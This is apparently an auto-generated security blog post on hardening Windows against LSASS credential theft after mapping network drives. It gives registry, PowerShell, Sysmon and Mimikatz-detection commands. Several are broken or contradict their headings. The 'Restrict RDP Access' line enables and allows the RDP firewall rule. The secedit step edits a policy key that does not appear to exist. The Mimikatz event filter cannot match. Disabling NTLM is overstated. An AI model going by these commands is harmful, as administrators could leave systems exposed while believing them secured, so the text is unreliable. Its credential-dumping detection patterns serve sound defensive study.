Listen to this Post
Mapper un lecteur réseau avec des identifiants différents expose ces identifiants dans la mémoire de la machine locale, surtout pour les comptes administrateurs. Cette pratique courante peut conduire à une compromission via LSASS (Local Security Authority Subsystem Service), un composant critique de Windows.
You Should Know: Hardening Windows Against Credential Theft
1. Disable Password Storage for Network Authentication
Apply this Group Policy Object (GPO) setting to prevent Windows from storing credentials:
Local Security Policy > Security Options > Network access: Do not allow storage of passwords and credentials for network authentication
Command to apply via PowerShell (Admin):
secedit /export /cfg C:\sec_policy.inf
(Get-Content C:\sec_policy.inf).replace("PasswordCredentials = 1", "PasswordCredentials = 0") | Set-Content C:\sec_policy.inf
secedit /configure /db C:\windows\security\local.sdb /cfg C:\sec_policy.inf /areas SECURITYPOLICY
Remove-Item C:\sec_policy.inf
2. Protect LSASS from Memory Dumping
Attackers often dump LSASS to extract credentials. Mitigate this with:
– Enable LSASS Protection (Windows 10/11 & Server 2019+):
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
– Enable Credential Guard (Virtualization-Based Security):
Enable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-CredentialGuard"
- Detect & Block Suspicious Access to LSASS
Use Sysmon to log LSASS access attempts:
<Sysmon schemaversion="4.90"> <EventFiltering> <RuleGroup name="LSASS Protection" groupRelation="or"> <ProcessAccess onmatch="include"> <TargetImage condition="contains">lsass.exe</TargetImage> </ProcessAccess> </RuleGroup> </EventFiltering> </Sysmon>
Deploy Sysmon:
sysmon.exe -accepteula -i C:\sysmon_config.xml
4. Automate Hardening with Open-Source Tools
Use HardeningKitty to audit and secure Windows systems:
Invoke-WebRequest -Uri "https://github.com/scipag/HardeningKitty/archive/refs/heads/master.zip" -OutFile "HardeningKitty.zip" Expand-Archive -Path "HardeningKitty.zip" -DestinationPath "C:\HardeningKitty" cd C:\HardeningKitty\HardeningKitty-master .\HardeningKitty.ps1 -Audit -Report
5. Monitor for Credential Dumping Attacks
- Detect Mimikatz-like activity:
Get-WinEvent -LogName "Security" | Where-Object { $<em>.Id -eq 4688 -and $</em>.Message -like "mimikatz" } - Block WDigest (Prevents plaintext password storage):
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 0 /f
What Undercode Say
Credential exposure via network drive mapping is a critical yet overlooked attack vector. Attackers leverage tools like Mimikatz, ProcDump, and PowerShell Empire to extract credentials from LSASS. Implementing Credential Guard, LSASS Protection, and strict GPO policies reduces attack surfaces.
Additional hardening steps:
- Disable NTLM:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LmCompatibilityLevel /t REG_DWORD /d 5 /f
- Enable SMB Signing:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" /v RequireSecuritySignature /t REG_DWORD /d 1 /f
- Restrict RDP Access:
netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes action=allow
Expected Output:
✅ GPO enforced: No credential storage for network access
✅ LSASS hardened: Protected via PPL & Credential Guard
✅ Logging enabled: Sysmon detects LSASS access
✅ Automated hardening: HardeningKitty audit reports generated
Further Reading:
References:
Reported By: Arisack Sivanh – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
